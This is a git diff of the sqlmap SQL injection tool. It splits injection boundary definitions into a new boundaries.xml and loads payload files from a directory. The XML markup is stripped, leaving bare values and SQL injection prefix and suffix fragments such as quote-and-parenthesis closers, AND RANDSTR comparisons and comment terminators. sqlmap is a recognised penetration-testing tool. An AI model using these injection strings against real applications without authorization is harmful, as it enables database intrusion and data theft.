diff --git a/lib/core/common.py b/lib/core/common.py
index 11f9c9fc1..5b9ea7afd 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -1085,6 +1085,7 @@ def setPaths():
paths.SQLMAP_UDF_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "udf")
paths.SQLMAP_XML_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "xml")
paths.SQLMAP_XML_BANNER_PATH = os.path.join(paths.SQLMAP_XML_PATH, "banner")
+ paths.SQLMAP_XML_PAYLOADS_PATH = os.path.join(paths.SQLMAP_XML_PATH, "payloads")
_ = os.path.join(os.path.expanduser("~"), ".sqlmap")
paths.SQLMAP_OUTPUT_PATH = getUnicode(paths.get("SQLMAP_OUTPUT_PATH", os.path.join(_, "output")), encoding=sys.getfilesystemencoding())
@@ -1105,7 +1106,7 @@ def setPaths():
paths.USER_AGENTS = os.path.join(paths.SQLMAP_TXT_PATH, "user-agents.txt")
paths.WORDLIST = os.path.join(paths.SQLMAP_TXT_PATH, "wordlist.zip")
paths.ERRORS_XML = os.path.join(paths.SQLMAP_XML_PATH, "errors.xml")
- paths.PAYLOADS_XML = os.path.join(paths.SQLMAP_XML_PATH, "payloads.xml")
+ paths.BOUNDARIES_XML = os.path.join(paths.SQLMAP_XML_PATH, "boundaries.xml")
paths.LIVE_TESTS_XML = os.path.join(paths.SQLMAP_XML_PATH, "livetests.xml")
paths.QUERIES_XML = os.path.join(paths.SQLMAP_XML_PATH, "queries.xml")
paths.GENERIC_XML = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "generic.xml")
diff --git a/lib/core/option.py b/lib/core/option.py
index 6288f52ee..9c40e7198 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -130,6 +130,7 @@ from lib.core.settings import WEBSCARAB_SPLITTER
from lib.core.threads import getCurrentThreadData
from lib.core.update import update
from lib.parse.configfile import configFileParser
+from lib.parse.payloads import loadBoundaries
from lib.parse.payloads import loadPayloads
from lib.parse.sitemap import parseSitemap
from lib.request.basic import checkCharEncoding
@@ -2400,6 +2401,7 @@ def init():
_setWriteFile()
_setMetasploit()
_setDBMSAuthentication()
+ loadBoundaries()
loadPayloads()
_setPrefixSuffix()
update()
diff --git a/lib/parse/payloads.py b/lib/parse/payloads.py
index f41db9dfd..84e6b0a82 100644
--- a/lib/parse/payloads.py
+++ b/lib/parse/payloads.py
@@ -5,6 +5,8 @@ Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
+import os
+
from xml.etree import ElementTree as et
from lib.core.data import conf
@@ -67,14 +69,32 @@ def parseXmlNode(node):
conf.tests.append(test)
-def loadPayloads():
+def loadBoundaries():
try:
- doc = et.parse(paths.PAYLOADS_XML)
+ doc = et.parse(paths.BOUNDARIES_XML)
except Exception, ex:
errMsg = "something seems to be wrong with "
- errMsg += "the file '%s' ('%s'). Please make " % (paths.PAYLOADS_XML, ex)
+ errMsg += "the file '%s' ('%s'). Please make " % (paths.BOUNDARIES_XML, ex)
errMsg += "sure that you haven't made any changes to it"
raise SqlmapInstallationException, errMsg
root = doc.getroot()
parseXmlNode(root)
+
+def loadPayloads():
+ payloadFiles = os.listdir(paths.SQLMAP_XML_PAYLOADS_PATH)
+ payloadFiles.sort()
+
+ for payloadFile in payloadFiles:
+ payloadFilePath = os.path.join(paths.SQLMAP_XML_PAYLOADS_PATH, payloadFile)
+
+ try:
+ doc = et.parse(payloadFilePath)
+ except Exception, ex:
+ errMsg = "something seems to be wrong with "
+ errMsg += "the file '%s' ('%s'). Please make " % (payloadFilePath, ex)
+ errMsg += "sure that you haven't made any changes to it"
+ raise SqlmapInstallationException, errMsg
+
+ root = doc.getroot()
+ parseXmlNode(root)
diff --git a/xml/boundaries.xml b/xml/boundaries.xml
new file mode 100644
index 000000000..0da7a6036
--- /dev/null
+++ b/xml/boundaries.xml
@@ -0,0 +1,519 @@
+
+
+
+
+
+
+
+ 3
+ 1
+ 1,2
+ 1
+ )
+
+
+
+
+ 4
+ 1
+ 1,2
+ 2
+ ')
+
+
+
+
+ 3
+ 1,2,3
+ 1,2
+ 2
+ '
+
+
+
+
+ 5
+ 1
+ 1,2
+ 4
+ "
+
+
+
+
+
+
+ 1
+ 1
+ 1,2
+ 1
+ )
+ AND ([RANDNUM]=[RANDNUM]
+
+
+
+ 2
+ 1
+ 1,2
+ 1
+ ))
+ AND (([RANDNUM]=[RANDNUM]
+
+
+
+ 3
+ 1
+ 1,2
+ 1
+ )))
+ AND ((([RANDNUM]=[RANDNUM]
+
+
+
+ 1
+ 0
+ 1,2,3
+ 1
+
+
+
+
+
+ 1
+ 1
+ 1,2
+ 2
+ ')
+ AND ('[RANDSTR]'='[RANDSTR]
+
+
+
+ 2
+ 1
+ 1,2
+ 2
+ '))
+ AND (('[RANDSTR]'='[RANDSTR]
+
+
+
+ 3
+ 1
+ 1,2
+ 2
+ ')))
+ AND ((('[RANDSTR]'='[RANDSTR]
+
+
+
+ 1
+ 1
+ 1,2
+ 2
+ '
+ AND '[RANDSTR]'='[RANDSTR]
+
+
+
+ 2
+ 1
+ 1,2
+ 3
+ ')
+ AND ('[RANDSTR]' LIKE '[RANDSTR]
+
+
+
+ 3
+ 1
+ 1,2
+ 3
+ '))
+ AND (('[RANDSTR]' LIKE '[RANDSTR]
+
+
+
+ 4
+ 1
+ 1,2
+ 3
+ ')))
+ AND ((('[RANDSTR]' LIKE '[RANDSTR]
+
+
+
+ 2
+ 1
+ 1,2
+ 3
+ '
+ AND '[RANDSTR]' LIKE '[RANDSTR]
+
+
+
+ 2
+ 1
+ 1,2
+ 4
+ ")
+ AND ("[RANDSTR]"="[RANDSTR]
+
+
+
+ 3
+ 1
+ 1,2
+ 4
+ "))
+ AND (("[RANDSTR]"="[RANDSTR]
+
+
+
+ 4
+ 1
+ 1,2
+ 4
+ ")))
+ AND ((("[RANDSTR]"="[RANDSTR]
+
+
+
+ 2
+ 1
+ 1,2
+ 4
+ "
+ AND "[RANDSTR]"="[RANDSTR]
+
+
+
+ 3
+ 1
+ 1,2
+ 5
+ ")
+ AND ("[RANDSTR]" LIKE "[RANDSTR]
+
+
+
+ 4
+ 1
+ 1,2
+ 5
+ "))
+ AND (("[RANDSTR]" LIKE "[RANDSTR]
+
+
+
+ 5
+ 1
+ 1,2
+ 5
+ ")))
+ AND ((("[RANDSTR]" LIKE "[RANDSTR]
+
+
+
+ 3
+ 1
+ 1,2
+ 5
+ "
+ AND "[RANDSTR]" LIKE "[RANDSTR]
+
+
+
+ 2
+ 1
+ 1,2
+ 2
+ %')
+ AND ('%'='
+
+
+
+ 3
+ 1
+ 1,2
+ 2
+ %'))
+ AND (('%'='
+
+
+
+ 4
+ 1
+ 1,2
+ 2
+ %')))
+ AND ((('%'='
+
+
+
+ 1
+ 1
+ 1,2
+ 2
+ %'
+ AND '%'='
+
+
+
+ 5
+ 1
+ 1,2
+ 2
+ %00')
+ AND ('[RANDSTR]'='[RANDSTR]
+
+
+
+ 4
+ 1
+ 1,2
+ 2
+ %00'
+ AND '[RANDSTR]'='[RANDSTR]
+
+
+
+ 1
+ 1
+ 1,2
+ 1
+
+ -- [RANDSTR]
+
+
+
+
+
+ 5
+ 1
+ 1,2
+ 2
+ ') WHERE [RANDNUM]=[RANDNUM]
+ --
+
+
+
+ 5
+ 1
+ 1,2
+ 2
+ ") WHERE [RANDNUM]=[RANDNUM]
+ --
+
+
+
+ 4
+ 1
+ 1,2
+ 1
+ ) WHERE [RANDNUM]=[RANDNUM]
+ --
+
+
+
+ 4
+ 1
+ 1,2
+ 2
+ ' WHERE [RANDNUM]=[RANDNUM]
+ --
+
+
+
+ 5
+ 1
+ 1,2
+ 4
+ " WHERE [RANDNUM]=[RANDNUM]
+ --
+
+
+
+ 4
+ 1
+ 1,2
+ 1
+ WHERE [RANDNUM]=[RANDNUM]
+ --
+
+
+
+
+
+ 5
+ 1
+ 1,2
+ 2
+ ')) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]
+ --
+
+
+
+ 5
+ 1
+ 1,2
+ 2
+ ")) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]
+ --
+
+
+
+ 5
+ 1
+ 1,2
+ 1
+ )) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]
+ --
+
+
+
+ 4
+ 1
+ 1,2
+ 2
+ ') AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]
+ --
+
+
+
+ 5
+ 1
+ 1,2
+ 4
+ ") AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]
+ --
+
+
+
+ 4
+ 1
+ 1,2
+ 1
+ ) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]
+ --
+
+
+
+
+
+ 5
+ 1
+ 1
+ 2
+ '||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]
+ )||'
+
+
+
+ 5
+ 1
+ 1
+ 2
+ '||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]
+ )||'
+
+
+
+ 5
+ 1
+ 1
+ 1
+ '+(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM]
+ )+'
+
+
+
+ 5
+ 1
+ 1
+ 2
+ '+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]
+ )+'
+
+
+
+
+
+ 4
+ 1
+ 1
+ 2
+ ' IN BOOLEAN MODE)
+ #
+
+
+
diff --git a/xml/payloads.xml b/xml/payloads/00_payloads.xml
similarity index 91%
rename from xml/payloads.xml
rename to xml/payloads/00_payloads.xml
index 5fb16dc72..6c3abadd7 100644
--- a/xml/payloads.xml
+++ b/xml/payloads/00_payloads.xml
@@ -1,66 +1,6 @@
-
-
- 3
- 1
- 1,2
- 1
- )
-
-
-
-
- 4
- 1
- 1,2
- 2
- ')
-
-
-
-
- 3
- 1,2,3
- 1,2
- 2
- '
-
-
-
-
- 5
- 1
- 1,2
- 4
- "
-
-
-
-
-
-
- 1
- 1
- 1,2
- 1
- )
- AND ([RANDNUM]=[RANDNUM]
-
-
-
- 2
- 1
- 1,2
- 1
- ))
- AND (([RANDNUM]=[RANDNUM]
-
-
-
- 3
- 1
- 1,2
- 1
- )))
- AND ((([RANDNUM]=[RANDNUM]
-
-
-
- 1
- 0
- 1,2,3
- 1
-
-
-
-
-
- 1
- 1
- 1,2
- 2
- ')
- AND ('[RANDSTR]'='[RANDSTR]
-
-
-
- 2
- 1
- 1,2
- 2
- '))
- AND (('[RANDSTR]'='[RANDSTR]
-
-
-
- 3
- 1
- 1,2
- 2
- ')))
- AND ((('[RANDSTR]'='[RANDSTR]
-
-
-
- 1
- 1
- 1,2
- 2
- '
- AND '[RANDSTR]'='[RANDSTR]
-
-
-
- 2
- 1
- 1,2
- 3
- ')
- AND ('[RANDSTR]' LIKE '[RANDSTR]
-
-
-
- 3
- 1
- 1,2
- 3
- '))
- AND (('[RANDSTR]' LIKE '[RANDSTR]
-
-
-
- 4
- 1
- 1,2
- 3
- ')))
- AND ((('[RANDSTR]' LIKE '[RANDSTR]
-
-
-
- 2
- 1
- 1,2
- 3
- '
- AND '[RANDSTR]' LIKE '[RANDSTR]
-
-
-
- 2
- 1
- 1,2
- 4
- ")
- AND ("[RANDSTR]"="[RANDSTR]
-
-
-
- 3
- 1
- 1,2
- 4
- "))
- AND (("[RANDSTR]"="[RANDSTR]
-
-
-
- 4
- 1
- 1,2
- 4
- ")))
- AND ((("[RANDSTR]"="[RANDSTR]
-
-
-
- 2
- 1
- 1,2
- 4
- "
- AND "[RANDSTR]"="[RANDSTR]
-
-
-
- 3
- 1
- 1,2
- 5
- ")
- AND ("[RANDSTR]" LIKE "[RANDSTR]
-
-
-
- 4
- 1
- 1,2
- 5
- "))
- AND (("[RANDSTR]" LIKE "[RANDSTR]
-
-
-
- 5
- 1
- 1,2
- 5
- ")))
- AND ((("[RANDSTR]" LIKE "[RANDSTR]
-
-
-
- 3
- 1
- 1,2
- 5
- "
- AND "[RANDSTR]" LIKE "[RANDSTR]
-
-
-
- 2
- 1
- 1,2
- 2
- %')
- AND ('%'='
-
-
-
- 3
- 1
- 1,2
- 2
- %'))
- AND (('%'='
-
-
-
- 4
- 1
- 1,2
- 2
- %')))
- AND ((('%'='
-
-
-
- 1
- 1
- 1,2
- 2
- %'
- AND '%'='
-
-
-
- 5
- 1
- 1,2
- 2
- %00')
- AND ('[RANDSTR]'='[RANDSTR]
-
-
-
- 4
- 1
- 1,2
- 2
- %00'
- AND '[RANDSTR]'='[RANDSTR]
-
-
-
- 1
- 1
- 1,2
- 1
-
- -- [RANDSTR]
-
-
-
-
-
-
- 5
- 1
- 1,2
- 2
- ') WHERE [RANDNUM]=[RANDNUM]
- --
-
-
-
- 5
- 1
- 1,2
- 2
- ") WHERE [RANDNUM]=[RANDNUM]
- --
-
-
-
- 4
- 1
- 1,2
- 1
- ) WHERE [RANDNUM]=[RANDNUM]
- --
-
-
-
- 4
- 1
- 1,2
- 2
- ' WHERE [RANDNUM]=[RANDNUM]
- --
-
-
-
- 5
- 1
- 1,2
- 4
- " WHERE [RANDNUM]=[RANDNUM]
- --
-
-
-
- 4
- 1
- 1,2
- 1
- WHERE [RANDNUM]=[RANDNUM]
- --
-
-
-
-
-
- 5
- 1
- 1,2
- 2
- ')) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]
- --
-
-
-
- 5
- 1
- 1,2
- 2
- ")) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]
- --
-
-
-
- 5
- 1
- 1,2
- 1
- )) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]
- --
-
-
-
- 4
- 1
- 1,2
- 2
- ') AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]
- --
-
-
-
- 5
- 1
- 1,2
- 4
- ") AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]
- --
-
-
-
- 4
- 1
- 1,2
- 1
- ) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]
- --
-
-
-
-
-
- 5
- 1
- 1
- 2
- '||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]
- )||'
-
-
-
- 5
- 1
- 1
- 2
- '||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]
- )||'
-
-
-
- 5
- 1
- 1
- 1
- '+(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM]
- )+'
-
-
-
- 5
- 1
- 1
- 2
- '+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]
- )+'
-
-
-
-
-
- 4
- 1
- 1
- 2
- ' IN BOOLEAN MODE)
- #
-
-
-
AND boolean-based blind - WHERE or HAVING clause